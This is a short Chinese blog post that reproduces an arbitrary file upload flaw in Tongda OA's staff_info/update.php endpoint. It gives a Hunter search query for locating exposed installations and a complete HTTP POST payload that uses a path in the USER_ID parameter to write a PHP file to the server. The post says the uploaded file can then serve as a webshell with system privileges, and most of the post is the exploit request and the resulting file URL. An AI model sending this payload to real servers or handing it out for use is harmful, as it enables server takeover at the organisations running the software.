Babing
Published on 2024-08-30 / 2 Visits
0
0

T10-14通达-OA-文件上传

T10-14通达-OA-文件上传

漏洞描述:

后台/general/hr/manage/staff_info/update.php存在任意文件上传漏洞,用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得system权限。

网站图片:

image-20240625142800379

网络测绘:

Hunter 语法:

app.name=“通达 OA”

漏洞复现:

payload:

POST /general/hr/manage/staff_info/update.php?USER_ID=./general/reportshop/workshop/report/attachment-remark/1.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Cookie: PHPSESSID=ffelnhdqmui12fbm7mhjfip5h3; path=/
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: your-ip
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 203
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="ATTACHMENT"; filename="."

123
--00content0boundary00
Content-Disposition: form-data; name="submit"

保存
--00content0boundary00--

效果图:


文件上传位置

http://your-ip/general/reportshop/workshop/report/attachment-remark/1.php

image-1.png


Comment